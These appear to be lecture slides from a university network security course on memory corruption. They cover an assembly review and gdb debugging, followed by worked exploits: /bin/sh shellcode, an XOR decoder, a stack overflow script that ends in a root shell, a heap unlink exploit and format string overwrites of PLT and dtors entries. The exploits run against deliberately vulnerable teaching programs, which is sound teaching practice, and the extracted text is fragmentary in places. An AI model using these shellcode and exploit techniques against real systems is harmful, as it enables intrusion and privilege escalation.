CS 4740/6740 Network Security: Lecture 7: Memory Corruption (Assembly Review, Basic Exploits)
CS 4740/6740 Network Security: Lecture 7: Memory Corruption (Assembly Review, Basic Exploits)
CS 4740/6740 Network Security: Lecture 7: Memory Corruption (Assembly Review, Basic Exploits)
Network Security
Lecture 7: Memory Corruption
(Assembly Review, Basic Exploits)
Assembly Review
Machine Model
Assembly Commands
Debugging
Assembly Review
-O0 -O3
abs:
push rbp
mov rbp, rsp
mov dword [rbp-0x8], edi
cmp dword [rbp-0x8], 0x0
jge .l0
abs:
mov eax, 0x0
mov eax, edi
sub eax, dword [rbp-0x8]
neg eax
mov dword [rbp-0x4], eax
cmovl eax, edi
jmp .l1
ret
.l0:
mov eax, dword [rbp-0x8]
mov dword [rbp-0x4], eax
.l1:
mov eax, dword [rbp-0x4]
pop rbp
ret
CPU and Memory
; ...might translate to
lea eax, [ebp-0x40]
mov edx, 0x04
mov ecx, 0x01
mov dword [eax+ecx*4], edx
Instruction Classes
Instructions commonly grouped by type of operation
Load/store, arithmetic, logic, comparison, control transfer
We'll go through a few common examples from each
Impossible to cover everything here
Compile programs, disassemble the output or capture assembly,
and investigate!
Loads, Stores
Instruction Effect Description
mov y, x yx Move y to x
tyx
Perform logical AND, set SF if
SF MSB(t)
test y, x MSB set in result, set ZF if
ZF t = 0?
result is 0, ...
...
ty-x
Perform signed subtraction,
SF MSB(t)
cmp y, x set SF if MSB set in result, set
ZF t = 0?
ZF if result is 0, ...
...
Control Transfers
Control transfers change the control flow of programs
Can be predicated on results of a prior comparison
Arithmetic, logic instructions also set flags
Distinction between jumps and calls
Jumps transfer control, calls used to implement procedures
Distinction between direct and indirect transfers
Direct transfers use relative offsets, indirect transfers are absolute
through a register or memory reference
24
Control Transfers (Jumps)
Instruction Condition Description
jmp x unconditional Direct or indirect jump
je/jz x ZF Jump if equal
jne/jnz x ZF Jump if not equal
jl x SF OF Jump if less (signed)
jle x (SF OF) ZF Jump if less or equal (signed)
jg x (SF OF) ZF Jump if greater (signed)
jb x CF Jump if below (unsigned)
ja x CF ZF Jump if above (unsigned)
js x SF Jump if negative
25
Procedures
Procedures (functions) are intrinsically linked to the stack
Provides space for local variables
Records where to return to
Used to pass arguments (sometimes)
Implemented using stack frames, or activation records
Control Transfers (Calls)
Instruction Condition Description
29
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...
_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret
30
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...
_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret
31
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...
_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret
32
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...
_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret
33
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...
_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret
34
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...
_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret
35
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...
_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret
36
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...
_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret
37
Stack Frames
_auth:
; ...
mov dword ptr [ebp - 48], edx
call strncpy
mov byte ptr [ebp - 17], 0
; ...
_strncpy:
push ebp
mov ebp, esp
sub esp, 0x30
; ...
add esp, 0x30
pop ebp
ret
38
Calling Conventions
Standards exist for procedures known as calling conventions
Specify where arguments are passed (registers, stack)
Specify the caller and callee's responsibilities
Who deallocates argument space on stack?
Which registers can be clobbered by callee, who must save
them?
Why do we need standards?
Interoperability code compiled by different toolchains must work
together
Calling Conventions
We often speak of callers and callees
Callers invoke a procedure i.e., call site
Callees are invoked i.e., call target
Conventions must specify how registers are dealt with
Could always save everything, but that's inefficient
Usually, some registers can be overwritten by the callee
(clobbered), others cannot
Registers that are clobbered are caller saved
Registers that must not be clobbered are callee saved
Calling Conventions
cdecl stdcall
stdcall_fn:
cdecl is the Linux 32 bit calling
; ...
convention pop ebp
Arguments passed on the ret 0x10 ; return and clean up
stack right to left (reverse arguments
order)
stdcall is used by the Win32 API,
eax, edx, ecx are caller
among others
saved (i.e., can be clobbered)
Almost identical to cdecl
Remaining registers are
However, the callee deallocates
callee saved
arguments on the stack
Return value in eax
Can you think of a reason why
Caller deallocates arguments
this is better or worse than
on stack after return
SysV AMD64 ABI
x86_64 calling convention used on Linux, Solaris, FreeBSD, Mac OS X
First six (integer) arguments passed in registers rdi, rsi, rdx, rcx, r8,
r9
(Except syscalls, where rcx r10)
Additional arguments spill to stack
Return value in rax
SysV AMD64 ABI Example
int auth(const char* user) {
size_t i;
char buf[16];
strncpy(buf, user, sizeof(buf));
// ...
_auth:
push rbp ; save previous frame pointer
mov rbp, rsp ; set new frame pointer
sub rsp, 0x30 ; allocate space for locals
movabs rdx, 0x10 ; move sizeof(buf) to rdx
lea rax, [rbp-0x20] ; get the address of buf
mov qword [rbp-0x08], rdi ; move user pointer into stack
mov rsi, qword [rbp-0x08] ; mov user pointer back into rsi
mov rdi, rax ; move buf into rdi
call _strncpy ; call strncpy(rdi, rsi, rdx)
; ...
System Calls
Systems calls are special control flow transfers from program code to
OS code
Used to access OS-level APIs and devices
Accept parameters just like other procedures/functions
But the argument passing format is different
Change protection-level from Userland (Ring 3) to Kernel Mode
(Ring 0)
Also implemented using stack frames
But again, things are more complicated vs. intra-program control
flow transfers
System Calls
Instruction Condition Description
esp esp - 4
Mem(esp) Succ(eip) Push eip, code segment, flags, esp, and
esp esp 4 stack segment onto the stack. Disable
Mem(esp) cs protected mode (by modifing flags).
int x
Change eip to the address of the
eflags eflags & interrupt handler specified in the
DISABLE_PROTECTION_MASK Interrupt Vector Table (IVT)
eip Addr(IVT[x])
0000000000400230 <_start>:
400230: 48 c7 c7 00 00 00 00 mov rdi,0x0
400237: e8 e4 ff ff ff call 400220 <_exit@plt>
40023c: cc int3
52
System Calls
Systems calls are special control flow transfers from program code to
OS code
Used to access OS-level APIs and devices
Accept parameters just like other procedures/functions
But the argument passing format is different
Change protection-level from Userland (Ring 3) to Kernel Mode
(Ring 0)
Also implemented using stack frames
But again, things are more complicated vs. intra-program control
flow transfers
System Calls
Instruction Condition Description
esp esp - 4
Mem(esp) Succ(eip) Push esp, code segment, flags, esp, and
esp esp 4 stack segment onto the stack. Disable
Mem(esp) cs protected mode (by modifing flags).
int x
Change eip to the address of the
eflags eflags & interrupt handler specified in the
DISABLE_PROTECTION_MASK Interrupt Vector Table (IVT)
eip Addr(IVT[x])
56
Invoking Syscalls
bits 64 ; as before...
section .text
global _start
_start:
mov rdx, msg_len ; len(msg) to rdx
mov rsi, msg ; msg to rsi
mov rdi, 1 ; fd 1 (stdout) to rdi
mov rax, 1 ; write is syscall 1
syscall ; call write(rdi, rsi, rdx)
int3
section .data
Initial setup
Set default disassembly syntax
Display current instruction at each step
Control how gdb deals with programs that fork()
Also useful for setting breakpoints, scripting program execution to
known interesting state, etc.
Let's debug hello from before
Starting gdb
> gdb hello
GNU gdb (GDB) 7.8
[...]
(gdb) b _start
Breakpoint 1 at 0x4000b0
(gdb)
We load the program in gdb and set a breakpoint at _start
Breakpoints insert (by default) a software interrupt at the given
address (int3)
When int3 executes, control transfers to gdb
Original instruction is restored and executed
Then, the int3 is restored
Running the program
(gdb) r
Starting program: [...]/hello
Breakpoint 1, 0x00000000004000b0 in _start ()
1: x/i $rip
=> 0x4000b0 <_start>: movabs rdx,0x4
launch_shell:
sub rsp, byte 0x78
xor rcx, rcx
mov byte [rel pad], cl
lea rdi, [rel path]
mov qword [rsp+0x10], rdi
mov qword [rsp+0x18], rcx
mov qword [rsp+0x08], rcx
lea rsi, [rsp+0x10]
lea rdx, [rsp+0x08]
mov rax, rcx
mov al, byte 59
syscall
path db '/bin/sh'
pad db 0x0a
Shellcode Analysis
jmp .str ; jump to our string
.str_ret:
pop eax ; pop addr into eax
; ...
.str:
call .str_ret ; return to payload
db '/bin/sh' ; our string
_start:
xor rax, rax ; zero rax
mov rcx, rax ; zero rcx
mov cl, byte payload_len ; set decode length
mov rsi, key ; mov rsi, key
jmp .get_payload ; get payload addr
.payload_ret:
pop rdi ; pop addr
.decode:
mov rdx, qword [rdi+rax*8] ; load current qword
xor rdx, rsi ; decode it
mov qword [rdi+rax*8], rdx ; store decoded qword
inc rax ; increment index
loop .decode ; loop while rcx > 0
jmp .payload ; execute the payload
.get_payload:
call .payload_ret
.payload:
Encoded Payload
1. Uses the jmpcall trick to get the payload address
2. Loops over encoded payload, decodes qword chunks
. A simple brute-force search will provide you a suitable key most of
the time
Decoders can be much more complex, of course
Added complexity not worth it here
But, decoders are highly useful in general
Locating the Shellcode
Enough shellcode tricks for now, let's finish the exploit
Where will we put the (possibly encoded) payload?
Since the stack is executable here, let's put it there
What's actually on the stack?
Stack Layout
Locating the Shellcode
In our case, we could go for either the frame copy, or the original
argument copy
What problem could we run into if we use the frame buffer copy?
Let's do the latter for this exploit?
How to find the address of the argument buffer?
Could calculate it statically
But, it's faster to debug and pull out the addresses
Locating the Shellcode
> gcc ggdb -O0 -fPIC -fPIE -fno-stack-protector -z execstack -o vuln vuln.c
> nasm f bin o payload.bin payload.asm
> nasm f bin o decoder.bin decoder.asm
> ./xor payload.bin 256 > payload.enc
> cat decoder.bin payload.enc > exploit
> gdb vuln
(gdb) b main
Breakpoint 1 at 0x4005d4
(gdb) r "$(cat exploit)"
[repeat below to step to strcpy call]
(gdb) si
0x400611 in main()
1: x/i $rip
=> 0x400611 <main+65>: call 0x4004c0 <strcpy@plt>
(gdb) si
[use finish to immediately return from strcpy]
(gdb) fin
(gdb) p/x $rax
$1 = 0x7fffffffe640
Locating the Saved IP
(gdb) x/2xg $rbp
0x7fffffffe750: 0x0000000000000000 0x00007ffff7a54b05
(gdb) p/x 0x7fffffffe758 - 0x7fffffffe640
$2 = 0x118
buf_len = 0x118
ret_addr = 0x7fffffffea60
payload = open('exploit').read()
buf = ('\x90' * (buf_len - len(payload))) \
+ payload + struct.pack('<Q', ret_addr)
sys.stdout.write(buf)
Finally
> gdb vuln
(gdb) r $(./exploit.py)
Starting program: [...]/stack/vuln $(./exploit.py)
????????????????????????????????????????????????????[...]
process 62743 is executing new program: /usr/bin/bash
warning: Could not load shared library symbols for linux-vdso.so.1.
Do you need set solib-search-path or set sysroot?
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),
[...]
Smashing the Heap
Heap Data Structures
Exploit Construction
Heap-based Overflows
The stack isn't the only target for overflows
The heap is also a popular exploitation target
Completely different beast than stack-based overflows
Much more difficult due to (usually) non-deterministic shape of
heap
Many different types of heap overflows
We'll examine one prominent example
Heaps
char* buf = malloc(1024);
// ...
free(buf);
Yorktown AIX
RtlHeap Windows
phkmalloc *BSD
ptmalloc
Extremely popular malloc (default in glibc)
Stores memory management metadata inline with user data
Stored as small chunks before and after user chunks
(Where have we seen a scheme like this before?)
Aggressive optimizations
Maintains lists of free chunks binned by size
Merges consecutive free chunks to avoid fragmentation
Heap-based Overflows
First demonstrated by Solar Designer in 2000
JPEG COM marker processing vulnerability in Netscape
Proposed a generic way to exploit heap-based overflows
Idea: Attack the memory manager itself, taking advantage of
mixed data and control information
Generic since all programs on a platform usually use the default
system allocator
Heap Layout
The heap is divided into
contiguous memory chunks
Chunks either allocated (in
use by user) or free for
allocation
Bordered by the wilderness
Each chunk can be split and
combined as needed
No two free chunks can be
adjacent
Control Blocks
struct malloc_chunk {
size_t prev_size;
size_t size;
struct malloc_chunk* fd;
struct malloc_chunk* bk;
}
prev_size
If the previous chunk is free, contains its size
Otherwise, holds user data of the previous chunk
Control Blocks
struct malloc_chunk {
size_t prev_size;
size_t size;
struct malloc_chunk* fd;
struct malloc_chunk* bk;
}
size
Equals the requested memory + sizeof(size) rounded up the next
multiple of 8
3 LSBs are always free and used for status bits
e.g., PREV_INUSE, IS_MMAPPED
Control Blocks
struct malloc_chunk {
size_t prev_size;
size_t size;
struct malloc_chunk* fd;
struct malloc_chunk* bk;
}
fd, bk
Pointers used to link free chunks into double-linked lists
Otherwise, contain user data
Allocated Chunk
Free Chunk
Contiguous Chunks
Memory Allocation
Free chunks are maintained in bins
Double-linked list of chunks
Bins organized by size
Allocation
Bins scanned in increasing order
Return a chunk of exact size, or split a larger one
Deallocation
If chunk borders the wilderness, it is consolidated
If adjacent chunks are free, they are consolidated
Consolidation removes old chunks and reinserts a larger merged chunk
List Handling
#define unlink(P, BK, FD)
free(msg);
return 0;
}
Exploitation
Use gdb to find
1. Address of the saved IP for RecvMsg
2. Address of the msg buffer to place NOP sled and payload
Structure the chunks as in the classic unlink exploit
. Make sure to include forward jump to bypass the clobbered section
of the NOP sled
Reuse the shellcode from the stack exploit as-is
Exploitation
addr_ret_addr = 0x7fffffffe7a8
ret_addr = 0x40c040
payload = open('payload.bin').read()
chk_w =
struct.pack('<qqqq', 1, 65, addr_ret_addr - 24, ret_addr)
+ ('A' * 32)
chk_z = struct.pack( '<qqqq', 1, 65, 0, 0) + ('B' * 32)
buf = struct.pack( '<HH', 256, 256)
+ ('\x90' * 48)
+ '\xeb\x1e'
+ ('\x90' * (206 - len(payload)))
+ payload
+ chk_w
+ chk_z
+ '\n'
sys.stdout.write(buf)
Inspecting the Heap
(gdb) c
Breakpoint 2, RecvMsg(sk=0) at vuln.cpp:28
28 free(msg);
(gdb) n
(gdb) x/32xg 0x40c040
0x40c040: 0x9090909090901eeb 0x9090909090909090
0x40c050: 0x00007fffffffe790 0x9090909090909090
0x40c060: 0x9090909090909090 0x9090909090909090
[...]
0x40c0c0: 0x9090909090909090 0x9090909090909090
0x40c0d0: 0x78ec834890909090 0x00002e0d88c93148
0x40c0e0: 0x000000203d8d4800 0x4c894810247c8948
0x40c0f0: 0x4808244c89481824 0x24548d481024748d
0x40c100: 0x050f3bb0c8894808 0x0168732f6e69622f
0x40c110: 0x0000000000000001 0x0000000000000041
0x40c120: 0x00007fffffffe790 0x000000000040c040
0x40c130: 0x4141414141414141 0x4141414141414141
Comments
Exploiting the heap is more difficult than the stack
Heap layout depends on runtime behavior of the program
Depending on program inputs, chunks might or might not be
allocated in the required pattern
And, location of chunks might be unpredictable
(Problematic if payload is on the heap)
Some techniques exist to mitigate these difficulties
Allocating many chunks
Heap spraying (more later)
More Vulnerabilities
Integer Overflows
Format Strings
Function Pointers, PLT, dtors, vtables
More Vulnerabilities
The stack and the heap are classic exploitation targets, but by no
means the only ones
In this section, we'll cover some more major classes
Integer overflows
Format strings
Function pointers
Integer Overflows
Class of bugs resulting from limitations of integer presentations
Integer overflows don't directly lead to buffer overflows
But, can be used to bypass bounds checks
Can result in unintended execution paths or incorrect computations
with security implications
Integer Representation
Recall that integers are represented as fixed-width binary numbers
Arithmetic performed mod 2W
What happens when an integer is too large to represent?
Undefined behavior
Compilers can do anything they like!
In practice, overflows are ignored, and computation continues
Perhaps with incorrect results...
Integer Overflows
x = 0xffffffff;
y = 1;
r = x + y;
Width Overflows
uint32_t x = 0x10000;
uint16_t y = 1;
uint16_t z = x + y; // z = ?
$ python gen_fmt_str.py
XXXXXXXX%04361x%6$hn%08465x%7$hn
We'll use a format string exploit to overwrite the PLT entry for printf
Exploitation
(gdb) x/3i printf@plt
0x80484a0: jmp DWORD PTR ds:0x80499ec
0x80484a6: push 0x18
0x80484ab: jmp 0x8048460
The compiler automatically registered our init and fini functions for
execution as constructors and destructors
Initialization and finalization are handled by the C runtime (part of
libc)
_start
_start:
xor ebp, ebp ; clear frame pointer
pop esi ; get argc
mov ecx, esp ; get argv
and esp, 0xfffffff0 ; align the stack
push eax
push esp
push edx
push 0x80487b0 ; push __libc_csu_fini
push 0x8048740 ; push __libc_csu_init
push ecx ; push argv
push esi ; push argc
push 0x80486a0 ; push main
call 0x8048470 ; call __libc_start_main
__libc_csu_init
__libc_csu_init:
; ...
.loop
mov eax, dword [esp+0x38]
mov dword [esp], ebp
mov dword [exp+0x08], eax
mov eax, dword [esp+0x34]
mov dword [esp+0x04], eax
call dword [ebx+edi*4+0x38]
add edi, 0x01
cmp edi, esi
jne .loop
; ...
ctors
(gdb) x/4xw $ebx + 0x38
0x8049acc: 0x08048610 0x08048640 0x08048530 0x00000000
(gdb) disas 0x08048610
Dump of code for function frame_dummy:
[...]
(gdb) disas 0x08048640
Dump of code for function vuln_init():
[...]
(gdb) disas 0x08048530
Dump of code for function _GLOBAL__I_a:
[...]
dtors
For an attacker, dtors are a more attractive target
Usually, ctors have already executed, so overwriting a ctor pointer
wouldn't have any effect
dtors are also stored in a vector of function pointers
Not executed by __libc_csu_fini, instead by glibc
dtors
Breakpoint 4, vuln_fini () at vuln.cpp:14
14 printf(cleaning up\n);
1: x/i $eip
=> 0x8048689: mov DWORD PTR [esp],ecx
(gdb) bt
#0 vuln_fini ()
#1 0xf7feb60c in _dl_fini ()
#2 0xf7cfc721 in __run_exit_handlers ()
#3 0xf7cfc77d in exit ()
#4 0xf7ce499b in __libc_start_main ()
#5 0x0804856f in _start ()
dl_fini
(gdb) x/8i 0xf7feb606
0xf7feb606: mov esi,eax
0xf7feb608: call DWORD PTR [edi+esi*4-0x4]
0xf7feb60c: sub esi,0x1
0xf7feb60f: jne 0xf7feb608 <_dl_fini+472>
(gdb) x/2xw $edi
0x8049ac4: 0x080485f0 0x08048670
(gdb) disas 0x080485f0
Dump of code for function __do_global_dtors_aux: [...]
(gdb) disas 0x08048670
Dump of code for function vuln_fini():
[...]
Exploitation
v0 = 0x1111 - 8
v1 = 0x2222 - v0 - 8
base_addr = 0x8049ac8
base_off = 6
buf = struct.pack('<II', base_addr, base_addr + 2)
buf += '%0{0}x%{2}$hn%0{1}x%{3}$hn'.format(
v0,
v1,
base_off,
base_off + 1)
sys.stdout.write(buf)
Exploitation
(gdb) r $(cat input)
starting up
buf = [...]
Program received signal SIGSEGV, Segmentation fault.
0x22221111 in ?? ()
1: x/i $eip
=> 0x22221111: <error: Cannot access memory at 0x22221111>
vtables
Let's look at one more example of function pointers
C++ makes heavy use of function pointers
Think virtual functions
Which method is invoked can depend on the dynamic type of an
object
As usual, the solution is indirection
Objects contain vtables, or vectors of function pointers to
implementations of virtual methods for that object
vtables
class Base {
public:
virtual ~Base(void) {
}